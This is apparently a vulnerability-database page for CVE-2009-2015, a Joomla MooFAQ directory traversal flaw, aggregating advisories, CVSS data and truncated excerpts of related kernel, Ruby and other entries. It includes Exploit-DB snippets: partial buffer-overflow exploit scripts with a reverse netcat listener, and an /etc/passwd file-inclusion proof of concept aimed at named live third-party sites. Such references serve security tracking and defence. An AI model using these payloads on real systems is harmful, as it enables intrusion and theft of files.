CVE-2009-2015
Published 2009-06-09
Priority P3 · 46 · high · 7.5 · CVSS 2.0
AV:N / AC:L / Au:N / C:P / I:P / A:P
EXPLOIT
EPSS: 6.51% (92.9th percentile)
Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ideal | com_moofaq | — | — |
CVSS provenance
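| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | — | 7.3 | HIGH | — |
| vendor_redhat | — | 7.8 | HIGH | — |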
GHSA
GHSA-fqvc-89p2-jw8f: Directory traversal vulnerability in includes/file_includer
ghsa_unreviewed·2022-05-02
CVE-2009-2015 [HIGH] CWE-22 GHSA-fqvc-89p2-jw8f: Directory traversal vulnerability in includes/file_includer
Kernel
namei: allow restricted O_CREAT of FIFOs and regular files
kernel_security·2018-08-23·CVSS 7.2
CVE-2000-1134 [HIGH] namei: allow restricted O_CREAT of FIFOs and regular files
Disallows open of FIFOs or regular files not owned by the user in world
writable sticky directories, unless the owner is the same as that of the
directory or the file is opened without the O_CREAT flag. The purpose
is to make data spoofing attacks harder. This protection can be turned
on and off separately for FIFOs and regular files via sysctl, just like
the symlinks/hardlinks protection. This patch is based on Openwall's
"HARDEN_FIFO" feature by Solar Designer.
This is a brief list of old vulnerabilities that could have been prevented
by this feature, some of them even allow for privilege escalation:
CVE-2000-1134
CVE-2007-3852
CVE-2008-0525
CVE-2009-0416
CVE-2011-4834
CVE-2015-1838
CVE-2015-7442
CVE-2016-7489
This list is no
OSV
ruby1.9.1, ruby2.0, ruby2.3 vulnerabilities
osv·2017-07-25·CVSS 7.3
CVE-2009-5147 ruby1.9.1, ruby2.0, ruby2.3 vulnerabilities
It was discovered that Ruby DL::dlopen incorrectly handled opening
libraries. An attacker could possibly use this issue to open libraries with
tainted names. This issue only applied to Ubuntu 14.04 LTS. (CVE-2009-5147)
Tony Arcieri, Jeffrey Walton, and Steffan Ullrich discovered that the Ruby
OpenSSL extension incorrectly handled hostname wildcard matching. This
issue only applied to Ubuntu 14.04 LTS. (CVE-2015-1855)
Christian Hofstaedtler discovered that Ruby Fiddle::Handle incorrectly
handled certain crafted strings. An attacker could use this issue to cause
a denial of service, or possibly execute arbitrary code. This issue only
applied to Ubuntu 14.04 LTS. (CVE-2015-7551)
It was discovered that Ruby Net::SMTP incorrectly handled CRLF sequ
Red Hat
kernel: KVM: SVM: Don't BUG if userspace injects an interrupt with GIF=0
vendor_redhat·2025-06-18·CVSS 5.5
CVE-2022-50228 [MEDIUM] kernel: KVM: SVM: Don't BUG if userspace injects an interrupt with GIF=0
In the Linux kernel, the following vulnerability has been resolved:
KVM: SVM: Don't BUG if userspace injects an interrupt with GIF=0
Don't BUG/WARN on interrupt injection due to GIF being cleared,
since it's trivial for userspace to force the situation via
KVM_SET_VCPU_EVENTS (even if having at least a WARN there would be correct
for KVM internally generated injections).
kernel BUG at arch/x86/kvm/svm/svm.c:3386!
invalid opcode: 0000 [#1] SMP
CPU: 15 PID: 926 Comm: smm_test Not tainted 5.17.0-rc3+ #264
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015
RIP: 0010:svm_inject_irq+0xab/0xb0 [kvm_amd]
Code: 0b 0f 1f 00 0f 1f 44 00 00 80 3d ac b3 01 00 00 55 48 89 f5 53
RSP: 0018:ffffc90000b37d88 EFL
Red Hat
kernel: cxl/port: Hold port reference until decoder release
vendor_redhat·2025-02-26·CVSS 7.8
CVE-2022-49223 [HIGH] CWE-416 kernel: cxl/port: Hold port reference until decoder release
In the Linux kernel, the following vulnerability has been resolved:
cxl/port: Hold port reference until decoder release
KASAN + DEBUG_KOBJECT_RELEASE reports a potential use-after-free in
cxl_decoder_release() where it goes to reference its parent, a cxl_port,
to free its id back to port->decoder_ida.
BUG: KASAN: use-after-free in to_cxl_port+0x18/0x90 [cxl_core]
Read of size 8 at addr ffff888119270908 by task kworker/35:2/379
CPU: 35 PID: 379 Comm: kworker/35:2 Tainted: G OE 5.17.0-rc2+ #198
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015
Workqueue: events kobject_delayed_cleanup
Call Trace:
dump_stack_lvl+0x59/0x73
print_address_description.constprop.0+0x1f/0x150
? to_cxl_port+0x18/0x90 [cxl_core]
kas
Red Hat
kernel: tpm: efi: Use local variable for calculating final log size
vendor_redhat·2024-02-27·CVSS 5.5
CVE-2021-46951 [MEDIUM] CWE-191 kernel: tpm: efi: Use local variable for calculating final log size
In the Linux kernel, the following vulnerability has been resolved:
tpm: efi: Use local variable for calculating final log size
When tpm_read_log_efi is called multiple times, which happens when
one loads and unloads a TPM2 driver multiple times, then the global
variable efi_tpm_final_log_size will at some point become a negative
number due to the subtraction of final_events_preboot_size occurring
each time. Use a local variable to avoid this integer underflow.
The following issue is now resolved:
Mar 8 15:35:12 hibinst kernel: Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015
Mar 8 15:35:12 hibinst kernel: Workqueue: tpm-vtpm vtpm_proxy_work [tpm_vtpm_proxy]
Mar 8 15:35:12 hibinst kernel: RIP: 001
Red Hat
ruby: DL:: dlopen could open a library with tainted library name
vendor_redhat·2009-05-11·CVSS 7.3
CVE-2015-7551 [HIGH] CWE-267 ruby: DL:: dlopen could open a library with tainted library name
The Fiddle::Handle implementation in ext/fiddle/handle.c in Ruby before 2.0.0-p648, 2.1 before 2.1.8, and 2.2 before 2.2.4, as distributed in Apple OS X before 10.11.4 and other products, mishandles tainting, which allows context-dependent attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted string, related to the DL module and the libffi library. NOTE: this vulnerability exists because of a CVE-2009-5147 regression.
Statement: Red Hat Product Security has rated this issue as having Low security
impact. This issue is not currently planned to be addressed in future updates.
For additional information, refer to the Issue Severity Classification:
https://access.redhat.com/security/
No detection rules found.
Exploit-DB
Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)
exploitdb·2016-01-11
CVE-2015-7768 Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)
---
# Title: Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow.
# Date : 01/08/2016
# Author: TOMIWA.
# Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Software: Konica Minolta FTP Utility v1.0
# Tested: Windows 7 SP1 64bits
# Listen for a reverse netcat connection on port 4444
# root@kali:~# nc -nlvp 4444
# listening on [any] 4444 ...
# connect to [192.168.0.11] from (UNKNOWN) [192.168.0.109] 49158
# Microsoft Windows [Version 6.1.7601]
# Copyright (c) 2009 Microsoft Corporation. All rights reserved.
# C:\Program Files (x86)\KONICA MINOLTA\FTP Utility>
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7A
Exploit-DB
RM Downloader 2.7.5.400 - Local Buffer Overflow
exploitdb·2015-03-26
CVE-2009-1646 RM Downloader 2.7.5.400 - Local Buffer Overflow
---
#!/usr/bin/env python
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: RM Downloader v2.7.5.400 Local Buffer Overflow
#[+] Date: 25-03-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] Related Vulnerability/ies:
# http://www.exploit-db.com/exploits/8628/
#POC:
#IMG1:
#http://i.imgur.com/87sXIj8.png
from struct import pack
file="crack.ram"
junk="\x41"*35032
eip=pack('<I',0x7C9D30D7)
junk2="\x44"*4
#Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore
#ht
Exploit-DB
phpMyBackupPro - Arbitrary File Download
exploitdb·2009-11-16
CVE-2015-4181 phpMyBackupPro - Arbitrary File Download
---
################################################################################
Arbitrary File Download in phpMyBackupPro
Name Arbitrary File Download in phpMyBackupPro
Systems Affected phpMyBackupPro v 2.1 and possibly earlier versions
site http://www.phpmybackuppro.net
Author Amol Naik (amolnaik4[at]gmail.com)
Date 16/11/2009
################################################################################
############
1. OVERVIEW
############
phpMyBackupPro is a web-based MySQL backup application in PHP.
You can schedule backups, download, email or upload them with FTP and backup whole file directories.
Zip and gzip compression, easy interface and installation. Many languages and online help!
###############
2. DESCRIPTION
############
Exploit-DB
Steam 54/894 - Local Privilege Escalation
exploitdb·2009-08-07
CVE-2015-7985 Steam 54/894 - Local Privilege Escalation
---
Steam (Multiple .exe's) Local Privilege Escalation
By:
MrDoug
mrdoug13[at]gmail[dot]com
Version Info:
Steam windows client
Built: Jun 30 2009, at 13:29:32
Steam API: v008
Steam Package versions: 54/894
Greetz:
Slappywag, Doomchip, Bolo, Eliwood, and the rest.
Special Thanks:
Jeremy Brown and Nine:Situations:Group...
Their work led me to this.
The latest Steam client, (and other Steam related executables)
suffer the same privilege escalation issue we saw in Adobe Acrobat NOS
the other day (http://milw0rm.com/exploits/9199). This is particularly
bad because, by default, Steam starts automatically. That means that as
soon as an administrator logs in... game over.
POC:
C:\>cacls "C:\Program Files\Steam\Steam.exe"
C:\Program Files\Steam\Stea
Exploit-DB
Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
exploitdb·2009-06-08
CVE-2009-2015 Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
---
Joomla Component MooFAQ Local File Inclusion Vulnerability
###################################################
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Vulnerability : LFI
###################################################
Example:
http://localHost/path/components/com_moofaq/includes/file_includer.php?gzip=0&file=[LFI]
Demo Live (1):
http://www.paginaswebhonduras.com/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd
Demo Live (2):
http://www.uers.gov.do/components/com_moofaq/includes/file_includer.php?gzip=0&file=/etc/passwd
++++++++++++++++++++++++++++++++
[!] Produced in South America
FAQ Component using mooTools
20 July 2007
1.0
1.0.13
Douglas
Nuclei
Joomla! MooFAQ 1.0 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2009-2015 [HIGH] Joomla! MooFAQ 1.0 - Local File Inclusion
Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).
Template:
```yaml
id: CVE-2009-2015

info:
  name: Joomla! MooFAQ 1.0 - Local File Inclusion
  author: daffainfo
  severity: high
  description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).
  impact: |
    The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, information disclosure.
  remediation: |
    Update Joomla! MooFAQ to the latest version or apply the official patch provided by the vendor.
  reference:
    - https://www.exploit-db.com
```
Greynoiseio
NoiseLetter September 2025
blogs_greynoiseio
Bugzilla
CVE-2025-21740 kernel: KVM: x86/mmu: Ensure NX huge page recovery thread is alive before waking
bugzilla·2025-02-27
CVE-2025-21740 CVE-2025-21740 kernel: KVM: x86/mmu: Ensure NX huge page recovery thread is alive before waking
In the Linux kernel, the following vulnerability has been resolved:
KVM: x86/mmu: Ensure NX huge page recovery thread is alive before waking
When waking a VM's NX huge page recovery thread, ensure the thread is
actually alive before trying to wake it. Now that the thread is spawned
on-demand during KVM_RUN, a VM without a recovery thread is reachable via
the related module params.
BUG: kernel NULL pointer dereference, address: 0000000000000040
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015
RIP: 0010:vhost_task_wake+0x5/0x10
Call Trace:
set_nx_huge_pages+0xcc/0x1e0 [kvm]
param_att
Bugzilla
CVE-2022-49223 kernel: cxl/port: Hold port reference until decoder release
bugzilla·2025-02-26·CVSS 7.8
CVE-2022-49223 [HIGH] CVE-2022-49223 kernel: cxl/port: Hold port reference until decoder release
In the Linux kernel, the following vulnerability has been resolved:
cxl/port: Hold port reference until decoder release
KASAN + DEBUG_KOBJECT_RELEASE reports a potential use-after-free in
cxl_decoder_release() where it goes to reference its parent, a cxl_port,
to free its id back to port->decoder_ida.
BUG: KASAN: use-after-free in to_cxl_port+0x18/0x90 [cxl_core]
Read of size 8 at addr ffff888119270908 by task kworker/35:2/379
CPU: 35 PID: 379 Comm: kworker/35:2 Tainted: G OE 5.17.0-rc2+ #198
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015
Workqueue: events kobject_delayed_cleanup
Call Trace:
dump_stack_lvl+0x59/0x73
print_address_description.constprop.0+0x1f/0x150
? to_cxl_port+0x18/
Bugzilla
CVE-2009-5145 zope: Cross-site scripting (XSS) in ZMI pages through manage_tabs_message()
bugzilla·2017-08-21·CVSS 6.1
CVE-2009-5145 [MEDIUM] CVE-2009-5145 zope: Cross-site scripting (XSS) in ZMI pages through manage_tabs_message()
Cross-site scripting (XSS) vulnerability in ZMI pages that use the manage_tabs_message in Zope 2.11.4, 2.11.2, 2.10.9, 2.10.7, 2.10.6, 2.10.5, 2.10.4, 2.10.2, 2.10.1, 2.12.
Upstream patch:
https://github.com/zopefoundation/Zope/commit/2abdf14620f146857dc8e3ffd2b6a754884c331d
References:
http://www.openwall.com/lists/oss-security/2015/03/02/7
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5145
Bugzilla
CVE-2009-5147 CVE-2015-7551 ruby: DL::dlopen could open a library with tainted library name
bugzilla·2015-07-31·CVSS 7.3
CVE-2009-5147 [HIGH] CVE-2009-5147 CVE-2015-7551 ruby: DL::dlopen could open a library with tainted library name
DL::dlopen could open a library with tainted library name even if $SAFE > 0. This vulnerability affects Ruby versions 1.8, 1.9, 2.1, 2.2.
Upstream patch:
https://github.com/ruby/ruby/commit/4600cf725a86ce31266153647ae5aa1197b1215b
Additional information and CVE assignment:
http://seclists.org/oss-sec/2015/q3/222
Discussion:
Created ruby tracking bugs for this issue:
Affects: fedora-all [bug 1248937]
---
(In reply to Adam Mariš from comment #0)
> DL::dlopen could open a library with tainted library name even if $SAFE > 0.
> This vulnerability affects Ruby versions 1.8, 1.9, 2.1, 2.2.
This is hardly true, since DL was removed from Ruby 2.2:
https://github.com/ruby/ruby/commit/07308c4d30b8c5
Bugzilla
CVE-2015-3008 asterisk: TLS Certificate Common name NULL byte exploit
bugzilla·2015-04-09·CVSS 4.3
CVE-2015-3008 [MEDIUM] CVE-2015-3008 asterisk: TLS Certificate Common name NULL byte exploit
The following flaw was found in asterisk:
When Asterisk registers to a SIP TLS device and verifies the server, Asterisk will accept signed certificates that match a common name other than the one Asterisk is expecting if the signed certificate has a common name containing a null byte after the portion of the common name that Asterisk expected. For example, if Asterisk is trying to register to www.domain.com, Asterisk will accept certificates of the form www.domain.com\x00www.someotherdomain.com - for more information on this exploit, see https://fotisl.com/blog/2009/10/the-null-certificate-prefix-bug/
This issue is fixed in asterisk versions: 1.8.32.3, 11.17.1, 12.8.2, 13.3.2
Upstream advisory:
http://downloads.
Bugzilla
CVE-2009-5146 openssl: memory leak in hostname TLS extension
bugzilla·2015-03-18
CVE-2009-5146 CVE-2009-5146 openssl: memory leak in hostname TLS extension
A memory leak flaw was fixed in the hostname TLS extension:
https://github.com/openssl/openssl/commit/7587347bc48e7e8a1e800e48bb0a658f1557c424
This flaw was introduced with the backport of the TLS extension code first introduced in version 0.9.8k of openssl.
Additional information:
http://seclists.org/oss-sec/2015/q1/856
Discussion:
Statement:
This issue did not affect any versions of OpenSSL as shipped with Red Hat Enterprise Linux 5, 6, and 7.
Bugzilla
CVE-2009-5144 CVE-2015-2091 mod_gnutls: GnuTLSClientVerify require is ignored in directory and server context
bugzilla·2015-02-27·CVSS 7.5
CVE-2009-5144 [HIGH] CVE-2009-5144 CVE-2015-2091 mod_gnutls: GnuTLSClientVerify require is ignored in directory and server context
It was reported that under certain conditions mod_gnutls ignores "GnuTLSClientVerify require" when specified in directory [1] and server [2] context.
Suggested commit that fixes [2] is:
https://github.com/airtower-luna/mod_gnutls/commit/5a8a32bbfb8a83fe6358c5c31c443325a7775fc2
Patch for [1] is attached in the corresponding bugreport.
[1]: http://issues.outoforder.cc/view.php?id=93
[2]: https://bugs.debian.org/578663
Discussion:
Created mod_gnutls tracking bugs for this issue:
Affects: fedora-all [bug 1197128]
---
This CVE Bugzilla entry is for community support informational purposes only as it does not affect a package in a commercially supported Red Hat product. Refer to th
References:
http://secunia.com/advisories/35370
http://www.securityfocus.com/bid/35259
http://www.vupen.com/english/advisories/2009/1530
https://www.exploit-db.com/exploits/8898